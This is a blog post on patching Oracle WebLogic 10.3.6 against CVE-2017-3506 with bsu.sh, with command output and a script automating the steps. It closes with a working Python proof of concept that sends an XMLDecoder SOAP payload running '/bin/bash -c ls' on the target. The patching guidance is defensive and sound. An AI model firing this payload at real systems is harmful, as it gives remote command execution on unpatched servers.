How to apply a WebLogic patch



2018-01-09 15:12:35 | 732 words | 7,417 reads

WebLogic may be Oracle's heavyweight middleware, but vulnerabilities in it still surface from time to time. If they are not patched promptly, attackers quickly use them to trade compromised sites for points on vulnerability-reporting platforms, or to turn the host into a malware-serving box or a bot. Since patching WebLogic follows the same routine every time, this post records the procedure.
1. Environment

{MW_HOME} = /usr/local/bea
{WL_HOME} = /usr/local/bea/wlserver_10.3

Below, {MW_HOME} and {WL_HOME} stand in for the real paths.
2. Copy the patch archive into {MW_HOME}/utils/bsu/cache_dir and unpack it. You normally get a jar, a file named like patch-catalog_xxxxx.xml, and a README (if your English is fine, the README alone is enough to get the job done).
3. In {MW_HOME}/utils/bsu/, edit the memory setting in bsu.sh to MEM_ARGS="-Xms1500m -Xmx1500m". The heap a patch needs varies; too little makes bsu abort with an error, so if the machine has the RAM, set it generously.
4. Run the patch install command

bsu.sh -install -patch_download_dir={MW_HOME}/utils/bsu/cache_dir -patchlist={PATCH_ID} -prod_dir={WL_HOME}

Copy-pasting can mangle the command; if it errors out, type it by hand.
5. Now comes a long wait, which ends in one of two ways. Either the install succeeds:

Checking for conflicts............ No conflict(s) detected Installing Patch ID: FMJJ.. Result: Success 

or the patch conflicts with something already installed:

Checking for conflicts........... Conflict(s) detected - resolve conflict condition and execute patch installation again Conflict condition details follow: Patch FMJJ is mutually exclusive and cannot coexist with patch(es): EJUW,ZLNA 

The message says the new patch conflicts with the previously applied patches EJUW and ZLNA, so those have to be uninstalled before the install can continue.
Run

./bsu.sh -remove -verbose -patchlist=EJUW -prod_dir={WL_HOME} 

Another long wait: WebLogic checks whether anything depends on the patch being removed. When the conflict names two or more patches, pick any one (starting with the last one in the list is a good idea); after the wait, the tool may tell you that this patch cannot be removed until some other patch has been removed first:

Checking for conflicts....... Conflict(s) detected - resolve conflict condition and execute patch removal again Conflict condition details follow: The selected patch cannot be removed until the following patch(es) are removed first: ZLNA 

Then there is nothing for it but to remove them one by one in the order WebLogic dictates:

Checking for conflicts...........
No conflict(s) detected

Starting removal of Patch ID: EJUW
Removing /usr/local/bea/modules/com.bea.core.weblogic.stax_1.11.0.0.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3jmsclient.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3client.jar
Removing /usr/local/bea/modules/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/wlserver_10.3/bugsfixed/WLS-PSU-bugsfixed.txt
Removing /usr/local/bea/wlserver_10.3/bugsfixed/20780171-WLS-10.3.6.0.12_PSU_WebServices-ClientSide-Configuration-README.txt
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/APP-INF/lib/commons-fileupload.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmxclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls-schema_10.3.6.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/wlst/modules/jython-modules.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/bin/wlsifconfig.sh from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlstestclient.ear from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlthint3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils.full_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-2.0.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/schema/weblogic-domain-binding.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient+ssl.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlw-langx.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmsclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsafclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.apache_1.3.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsaft3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.zip from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.common.security.saml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/glassfish.jstl_1.2.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wls-api.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jstl-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.descriptor.wl.binding_1.4.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls_7.2.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-notran-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-xa-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jdbcdrivers.xml from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/uddiexplorer.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding.plugins_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/webapp/WEB-INF/lib/console.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/BUG20780171_1036012.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxp_1.4.5.0.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
Updating /usr/local/bea/patch_wls1036/profiles/default/sys_manifest_classpath/weblogic_patch.jar
Old manifest value: Class-Path= ../../../patch_jars/BUG20780171_1036012.jar ../../../patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar ../../../patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar ../../../patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxp_1.4.5.0.jar ../../../patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
New manifest value: Class-Path=
Result: Success

Then rerun the install, which now goes through cleanly:

Checking for conflicts............ No conflict(s) detected Installing Patch ID: FMJJ.. Result: Success 

6. Check that the newly installed patch appears in WebLogic's list of applied patches

[bsu]# ./bsu.sh -prod_dir=/usr/local/bea/wlserver_10.3 -status=applied -verbose -view
ProductName:       WebLogic Server
ProductVersion:    10.3 MP6
Components:        WebLogic Server/Core Application Server,WebLogic Server/Admi
                   nistration Console,WebLogic Server/Configuration Wizard and 
                   Upgrade Framework,WebLogic Server/Web 2.0 HTTP Pub-Sub Serve
                   r,WebLogic Server/WebLogic SCA,WebLogic Server/WebLogic JDBC
                    Drivers,WebLogic Server/Third Party JDBC Drivers,WebLogic S
                   erver/WebLogic Server Clients,WebLogic Server/WebLogic Web S
                   erver Plugins,WebLogic Server/UDDI and Xquery Support,WebLog
                   ic Server/Evaluation Database,WebLogic Server/Workshop Code 
                   Completion Support
BEAHome:           /usr/local/bea
ProductHome:       /usr/local/bea/wlserver_10.3
PatchSystemDir:    /usr/local/bea/utils/bsu
PatchDir:          /usr/local/bea/patch_wls1036
Profile:           Default
DownloadDir:       /usr/local/bea/utils/bsu/cache_dir
JavaVersion:       1.6.0_29
JavaVendor:        Sun


Patch ID:          FMJJ
PatchContainer:    FMJJ.jar
Checksum:          591477727
Severity:          optional
Category:          General
CR/BUG:            26519424
Restart:           true
Description:       WLS PATCH SET UPDATE 10.3.6.0.171017
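The loop of steps 2 to 6 can be scripted. The following Python 3 script is an added example, not code from the original post or from Oracle: it rewrites MEM_ARGS in bsu.sh, runs bsu.sh -install, parses the conflict message, uninstalls the conflicting patches (last listed first, recursing when bsu insists that another patch be removed beforehand), reinstalls, and then parses the -view output to confirm the patch is listed and whether bsu flags a restart. The paths, the 4-character patch IDs and the message formats it matches are taken from the bsu output quoted above; everything else (function names, the --dry-run flag, the embedded sample strings) is this example's own construction.

```python
#!/usr/bin/env python3
# Added example (not from the original post or from Oracle): script the
# install -> remove conflicts -> reinstall -> verify loop of steps 2-6.
# Assumes the bsu message formats and paths quoted in the post (WebLogic 10.3.6).
import re
import subprocess
import sys

MW_HOME = "/usr/local/bea"                   # assumed, as in the post
WL_HOME = MW_HOME + "/wlserver_10.3"
BSU_DIR = MW_HOME + "/utils/bsu"
CACHE_DIR = BSU_DIR + "/cache_dir"

IDS = r"([A-Z0-9]{4}(?:\s*,\s*[A-Z0-9]{4})*)"   # bsu patch IDs: FMJJ, EJUW, ...
CONFLICT_RE = re.compile(r"cannot coexist with patch\(es\):\s*" + IDS)
BLOCKER_RE = re.compile(r"are removed first:\s*" + IDS)

# Sample bsu output copied from the post, so the parsers can be exercised offline.
SAMPLE_CONFLICT = ("Conflict(s) detected - resolve conflict condition and execute patch "
                   "installation again Conflict condition details follow: Patch FMJJ is "
                   "mutually exclusive and cannot coexist with patch(es): EJUW,ZLNA")
SAMPLE_BLOCKED = ("Conflict condition details follow: The selected patch cannot be "
                  "removed until the following patch(es) are removed first: ZLNA")
SAMPLE_VIEW = ("Patch ID:          FMJJ\nPatchContainer:    FMJJ.jar\nCR/BUG:            26519424\n"
               "Restart:           true\nDescription:       WLS PATCH SET UPDATE 10.3.6.0.171017\n")

def _ids(match):
    return [p.strip() for p in match.group(1).split(",")] if match else []

def conflicts(install_output):
    """Patch IDs bsu says cannot coexist with the new patch ([] on success)."""
    return _ids(CONFLICT_RE.search(install_output))

def blockers(remove_output):
    """Patch IDs bsu wants removed before the requested one."""
    return _ids(BLOCKER_RE.search(remove_output))

def removal_plan(install_output):
    """Uninstall order for conflicts: last listed first, as the post suggests."""
    return list(reversed(conflicts(install_output)))

def set_mem_args(bsu_sh_text, xms="1500m", xmx="1500m"):
    """Step 3: rewrite the MEM_ARGS line of bsu.sh; fail loudly if it is absent."""
    new = 'MEM_ARGS="-Xms%s -Xmx%s"' % (xms, xmx)
    text, n = re.subn(r"^MEM_ARGS=.*$", new, bsu_sh_text, flags=re.M)
    if n == 0:
        raise ValueError("no MEM_ARGS line in bsu.sh")
    return text

def patch_records(view_output):
    """Step 6: parse 'bsu.sh -view' output into one dict per 'Patch ID:' block."""
    records = []
    for chunk in re.split(r"^(?=Patch ID:)", view_output, flags=re.M)[1:]:
        fields = re.findall(r"^([A-Za-z/ ]+):\s+(.*)$", chunk, flags=re.M)
        records.append({k: v.strip() for k, v in fields})
    return records

def verify_applied(view_output, patch_id):
    """(listed, needs_restart): bsu prints 'Restart: true' when a bounce is needed."""
    for rec in patch_records(view_output):
        if rec.get("Patch ID") == patch_id:
            return True, rec.get("Restart", "").lower() == "true"
    return False, False

def run_bsu(args, dry_run=False):
    """bsu.sh relies on relative paths, so run it from its own directory."""
    if dry_run:
        print("would run: ./bsu.sh " + " ".join(args))
        return ""
    p = subprocess.run(["./bsu.sh"] + args, cwd=BSU_DIR, capture_output=True, text=True)
    return p.stdout + p.stderr

def remove_patch(patch_id, dry_run=False, depth=0):
    """Step 5: uninstall; if bsu names patches that must go first, do those, then retry."""
    if depth > 10:
        raise RuntimeError("removal dependency chain too deep at " + patch_id)
    out = run_bsu(["-remove", "-verbose", "-patchlist=" + patch_id,
                   "-prod_dir=" + WL_HOME], dry_run)
    deps = blockers(out)
    if deps:
        for dep in deps:
            remove_patch(dep, dry_run, depth + 1)
        out = remove_patch(patch_id, dry_run, depth + 1)
    return out

def apply_patch(patch_id, dry_run=False):
    """Steps 4-5: install; on conflict remove the old patches and install again."""
    install = ["-install", "-patch_download_dir=" + CACHE_DIR,
               "-patchlist=" + patch_id, "-prod_dir=" + WL_HOME]
    out = run_bsu(install, dry_run)
    plan = removal_plan(out)
    for old in plan:
        remove_patch(old, dry_run)
    if plan:
        out = run_bsu(install, dry_run)
    return "Result: Success" in out

if __name__ == "__main__":
    dry = "--dry-run" in sys.argv
    pid = next((a for a in sys.argv[1:] if not a.startswith("--")), "FMJJ")
    ok = apply_patch(pid, dry_run=dry)
    view = run_bsu(["-prod_dir=" + WL_HOME, "-status=applied", "-verbose", "-view"], dry)
    print("install ok:", ok, "| listed, restart needed:", verify_applied(view, pid))
```

Run it first as python3 patch_wls.py FMJJ --dry-run to see the bsu commands it would issue; without --dry-run it calls bsu.sh for real, and each removal can take as long as the install did. The parsers deliberately only accept 4-character bsu patch IDs, so a stray capital letter at the start of the next output line is not mistaken for a patch.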

7. Use an existing PoC script, or any other method, to confirm the vulnerability is gone. Note the "Restart: true" line in the output above: bsu only rewrites jars on disk, so restart the Admin Server and every managed server before retesting, otherwise the old classes are still the ones loaded in the JVM.
Below is the Python check script for this vulnerability, CVE-2017-3506, borrowed from a well-known blogger (credit to the original author). Be aware that it is not a passive probe: the payload makes the target run /bin/bash -c ls, so only point it at servers you are authorized to test.

#!/usr/bin/env python
# coding:utf-8
# author: dayu (the original author's signature)
import re
from sys import argv

import requests

heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
}


def poc(url):
    # normalise the target and append the wls-wsat endpoint path
    if not url.startswith("http"):
        url = "http://" + url
    url = url.rstrip('/') + '/wls-wsat/CoordinatorPortType'
    # WorkContext header carrying an XMLDecoder document that builds and
    # starts a ProcessBuilder running "/bin/bash -c ls" on the server
    post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>ls</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''
    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        # keep only the SOAP fault string; its content shows whether the
        # payload was deserialised
        response = re.search(r"<faultstring>.*</faultstring>", response).group(0)
    except Exception:
        # connection error, timeout, or no <faultstring> in the reply
        response = ""
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        return "Vulnerability exist"
    return "No Vulnerability"


if __name__ == '__main__':
    if len(argv) == 1:
        print("usage: python poc.py url:port")
        exit(0)
    print(poc(url=argv[1]))

PS: these notes were taken while installing the patch for CVE-2017-3506. Patch ID installed: FMJJ; conflicting patch IDs: ZLNA, EJUW.

